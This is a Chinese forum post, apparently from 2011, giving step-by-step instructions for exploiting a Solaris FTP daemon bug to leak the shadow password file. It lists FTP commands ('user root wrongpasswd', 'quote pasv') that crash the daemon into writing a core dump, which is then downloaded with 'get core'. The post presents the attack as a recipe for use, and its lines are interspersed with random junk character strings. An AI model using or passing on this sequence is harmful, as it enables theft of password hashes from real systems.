找回密码
 注册

QQ登录

只需一步,快速开始

如何用FIP获取shadow口令文件

[复制链接]
发表于 2011-1-12 21:01:38 | 显示全部楼层 |阅读模式
该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:1 _! o" ~0 O% K8 I

- t* r4 a2 ]9 Q. @0 `, Y1.通过 ftp 正常登录到目的主机上, a+ {! X5 {! c1 F# v6 X3 Y
8 F$ \9 z* ?- s6 [* s! N
2.输入如下命令序列:- E9 F1 O' G, i; m
. G9 V7 |1 @: |  f) r( Z. R
ftp> user root wrongpasswd& T5 l5 k" s8 |+ y" I8 C

5 T7 |# w. a$ i* }7 S/ F# Jftp> quote pasv5 _" |* J2 y3 e+ w/ Q$ v

3 y6 a+ {6 a! z. c3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
' Y4 P! M$ _( t9 T
' M- N/ [; U, C  k% l4.再次进入FTP >get core! @: _# Z  \2 V
% |0 y" ?! I9 p! M& e5 \& f
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
7 g3 x' R# g9 c
5 h4 f4 U) Z" ~) f4 Z
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-6-14 23:31

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表